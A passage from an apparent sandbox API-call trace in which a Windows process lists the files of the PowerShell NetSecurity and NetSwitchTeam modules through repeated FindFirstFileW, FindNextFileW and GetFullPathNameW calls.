ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x103784ac, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xe6b, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetFirewallInterfaceTypeFilter.cmdletDefinition.cdxml", cAlternateFileName="")) returned 1 [0177.484] FindNextFileW (in: hFindFile=0x1a592a30, lpFindFileData=0x1b7de260 | out: lpFindFileData=0x1b7de260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x10352252, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x10352252, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x10352252, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1300, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetFirewallPortFilter.cmdletDefinition.cdxml", cAlternateFileName="")) returned 1 [0177.484] FindNextFileW (in: hFindFile=0x1a592a30, lpFindFileData=0x1b7de260 | out: lpFindFileData=0x1b7de260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x103784ac, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x103784ac, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x103784ac, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2077, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetFirewallProfile.cmdletDefinition.cdxml", cAlternateFileName="")) returned 1 [0177.485] FindNextFileW (in: hFindFile=0x1a592a30, lpFindFileData=0x1b7de260 | out: lpFindFileData=0x1b7de260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x10352252, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x10352252, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x10352252, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x7a32, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetFirewallRule.cmdletDefinition.cdxml", cAlternateFileName="")) returned 1 [0177.485] FindNextFileW (in: hFindFile=0x1a592a30, lpFindFileData=0x1b7de260 | out: lpFindFileData=0x1b7de260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x103784ac, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x103784ac, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x103784ac, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x15b2, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetFirewallSecurityFilter.cmdletDefinition.cdxml", cAlternateFileName="")) returned 1 [0177.485] FindNextFileW (in: hFindFile=0x1a592a30, lpFindFileData=0x1b7de260 | out: lpFindFileData=0x1b7de260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1039e70b, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x1039e70b, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x1039e70b, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xaf0, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetFirewallServiceFilter.cmdletDefinition.cdxml", cAlternateFileName="")) returned 1 [0177.486] FindNextFileW (in: hFindFile=0x1a592a30, lpFindFileData=0x1b7de260 | out: lpFindFileData=0x1b7de260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x103784ac, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x103784ac, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x1039e70b, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x18ed, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetFirewallSetting.cmdletDefinition.cdxml", cAlternateFileName="")) returned 1 [0177.486] FindNextFileW (in: hFindFile=0x1a592a30, lpFindFileData=0x1b7de260 | out: lpFindFileData=0x1b7de260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1039e70b, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x1039e70b, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x1039e70b, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x75d, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetGPO.cmdletDefinition.cdxml", cAlternateFileName="")) returned 1 [0177.487] FindNextFileW (in: hFindFile=0x1a592a30, lpFindFileData=0x1b7de260 | out: lpFindFileData=0x1b7de260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1039e70b, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x1039e70b, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x1039e70b, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2f27, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetIPsecDospSetting.cmdletDefinition.cdxml", cAlternateFileName="")) returned 1 [0177.487] FindNextFileW (in: hFindFile=0x1a592a30, lpFindFileData=0x1b7de260 | out: lpFindFileData=0x1b7de260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x103784ac, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x103784ac, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x103784ac, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x53e, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetIPsecIdentity.cmdletDefinition.cdxml", cAlternateFileName="")) returned 1 [0177.487] FindNextFileW (in: hFindFile=0x1a592a30, lpFindFileData=0x1b7de260 | out: lpFindFileData=0x1b7de260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1039e70b, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x1039e70b, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x1039e70b, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x32ac, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetIPsecMainModeCryptoSet.cmdletDefinition.cdxml", cAlternateFileName="")) returned 1 [0177.488] FindNextFileW (in: hFindFile=0x1a592a30, lpFindFileData=0x1b7de260 | out: lpFindFileData=0x1b7de260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x10352252, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x10352252, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x103784ac, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x4162, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetIPsecMainModeRule.cmdletDefinition.cdxml", cAlternateFileName="")) returned 1 [0177.488] FindNextFileW (in: hFindFile=0x1a592a30, lpFindFileData=0x1b7de260 | out: lpFindFileData=0x1b7de260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1039e70b, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x1039e70b, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x1039e70b, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x825, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetIPsecMainModeSA.cmdletDefinition.cdxml", cAlternateFileName="")) returned 1 [0177.488] FindNextFileW (in: hFindFile=0x1a592a30, lpFindFileData=0x1b7de260 | out: lpFindFileData=0x1b7de260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x103784ac, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x103784ac, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x103784ac, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2d50, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetIPsecPhase1AuthSet.cmdletDefinition.cdxml", cAlternateFileName="")) returned 1 [0177.489] FindNextFileW (in: hFindFile=0x1a592a30, lpFindFileData=0x1b7de260 | out: lpFindFileData=0x1b7de260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1039e70b, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x1039e70b, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x1039e70b, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2b0e, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetIPsecPhase2AuthSet.cmdletDefinition.cdxml", cAlternateFileName="")) returned 1 [0177.489] FindNextFileW (in: hFindFile=0x1a592a30, lpFindFileData=0x1b7de260 | out: lpFindFileData=0x1b7de260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x103784ac, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x103784ac, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x103784ac, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2b6, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetIPsecPolicyChange.cmdletDefinition.cdxml", cAlternateFileName="")) returned 1 [0177.489] FindNextFileW (in: hFindFile=0x1a592a30, lpFindFileData=0x1b7de260 | out: lpFindFileData=0x1b7de260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x10352252, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x10352252, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x10352252, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2e77, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetIPsecQuickModeCryptoSet.cmdletDefinition.cdxml", cAlternateFileName="")) returned 1 [0177.490] FindNextFileW (in: hFindFile=0x1a592a30, lpFindFileData=0x1b7de260 | out: lpFindFileData=0x1b7de260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1039e70b, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x1039e70b, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x1039e70b, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xea7, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetIPsecQuickModeSA.cmdletDefinition.cdxml", cAlternateFileName="")) returned 1 [0177.490] FindNextFileW (in: hFindFile=0x1a592a30, lpFindFileData=0x1b7de260 | out: lpFindFileData=0x1b7de260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x103784ac, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x103784ac, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x103784ac, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x994b, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetIPsecRule.cmdletDefinition.cdxml", cAlternateFileName="")) returned 1 [0177.491] FindNextFileW (in: hFindFile=0x1a592a30, lpFindFileData=0x1b7de260 | out: lpFindFileData=0x1b7de260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x103784ac, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x103784ac, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x103784ac, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x20fee, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetSecurity.formats.ps1xml", cAlternateFileName="")) returned 1 [0177.491] FindNextFileW (in: hFindFile=0x1a592a30, lpFindFileData=0x1b7de260 | out: lpFindFileData=0x1b7de260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1039e70b, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x1039e70b, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x1039e70b, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x13f1, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetSecurity.psd1", cAlternateFileName="")) returned 1 [0177.491] FindNextFileW (in: hFindFile=0x1a592a30, lpFindFileData=0x1b7de260 | out: lpFindFileData=0x1b7de260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x10352252, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x10352252, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x10352252, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12106, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetSecurity.types.ps1xml", cAlternateFileName="")) returned 1 [0177.492] FindNextFileW (in: hFindFile=0x1a592a30, lpFindFileData=0x1b7de260 | out: lpFindFileData=0x1b7de260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x10352252, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x10352252, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x10352252, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12106, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetSecurity.types.ps1xml", cAlternateFileName="")) returned 0 [0177.493] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de480) returned 1 [0177.493] GetFileAttributesW (lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetSecurity\\NetSecurity.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\netsecurity\\netsecurity.psd1")) returned 0x20 [0177.495] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7de510) returned 1 [0177.495] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetSwitchTeam", nBufferLength=0x105, lpBuffer=0x1b7de000, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetSwitchTeam", lpFilePart=0x0) returned 0x40 [0177.495] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetSwitchTeam\\", nBufferLength=0x105, lpBuffer=0x1b7ddfa0, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetSwitchTeam\\", lpFilePart=0x0) returned 0x41 [0177.496] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetSwitchTeam\\*", lpFindFileData=0x1b7de1b0 | out: lpFindFileData=0x1b7de1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13483f1, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa59c748, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa59c748, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a592790 [0177.498] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13483f1, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa59c748, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa59c748, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0177.499] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x11022c65, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x11022c65, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x11022c65, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x16ca, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetSwitchTeam.cdxml", cAlternateFileName="")) returned 1 [0177.499] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x11022c65, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x11022c65, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x11022c65, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x97c, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetSwitchTeam.format.ps1xml", cAlternateFileName="")) returned 1 [0177.499] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x11048ec0, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x11048ec0, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x11048ec0, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x4d2, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetSwitchTeamMember.cdxml", cAlternateFileName="")) returned 1 [0177.500] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x10ffca0f, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x10ffca0f, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x11022c65, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xd34, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetSwitchTeamMember.format.ps1xml", cAlternateFileName="")) returned 1 [0177.500] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x11048ec0, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x11048ec0, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x11048ec0, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x420, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetSwitchTeam.psd1", cAlternateFileName="")) returned 1 [0177.500] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x11048ec0, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x11048ec0, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x11048ec0, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x420, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetSwitchTeam.psd1", cAlternateFileName="")) returned 0 [0177.501] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de420) returned 1 [0177.501] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7de510) returned 1 [0177.501] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetSwitchTeam", nBufferLength=0x105, lpBuffer=0x1b7de000, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetSwitchTeam", lpFilePart=0x0) returned 0x40 [0177.502] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetSwitchTeam\\", nBufferLength=0x105, lpBuffer=0x1b7ddfa0, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetSwitchTeam\\", lpFilePart=0x0) returned 0x41 [0177.502] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetSwitchTeam\\*", lpFindFileData=0x1b7de1b0 | out: lpFindFileData=0x1b7de1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13483f1, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa59c748, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa59c748, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a592790 [0177.503] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13483f1, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa59c748, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa59c748, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0177.503] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x11022c65, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x11022c65, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x11022c65, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x16ca, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetSwitchTeam.cdxml", cAlternateFileName="")) returned 1 [0177.504] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x11022c65, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x11022c65, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x11022c65, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x97c, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetSwitchTeam.format.ps1xml", cAlternateFileName="")) returned 1 [0177.504] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x11048ec0, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x11048ec0, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x11048ec0, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x4d2, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetSwitchTeamMember.cdxml", cAlternateFileName="")) returned 1 [0177.505] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x10ffca0f, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x10ffca0f, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x11022c65, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xd34, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetSwitchTeamMember.format.ps1xml", cAlternateFileName="")) returned 1 [0177.505] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x11048ec0, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x11048ec0, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x11048ec0, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x420, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetSwitchTeam.psd1", cAlternateFileName="")) returned 1 [0177.505] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0177.506] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de420) returned 1 [0177.506] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetSwitchTeam", nBufferLength=0x105, lpBuffer=0x1b7de100, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetSwitchTeam", lpFilePart=0x0) returned 0x40 [0177.506] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7de540) returned 1 [0177.506] GetFileAttributesExW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetSwitchTeam" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\netswitchteam"), fInfoLevelId=0x0, lpFileInformation=0x1b7de620 | out: lpFileInformation=0x1b7de620*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13483f1, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa59c748, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa59c748, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0177.506] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de500) returned 1 [0177.506] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7de570) returned 1 [0177.506] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetSwitchTeam", nBufferLength=0x105, lpBuffer=0x1b7de060, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetSwitchTeam", lpFilePart=0x0) returned 0x40 [0177.506] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetSwitchTeam\\", nBufferLength=0x105, lpBuffer=0x1b7de000, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetSwitchTeam\\", lpFilePart=0x0) returned 0x41 [0177.507] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetSwitchTeam\\*", lpFindFileData=0x1b7de210 | out: lpFindFileData=0x1b7de210*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13483f1, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa59c748, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa59c748, 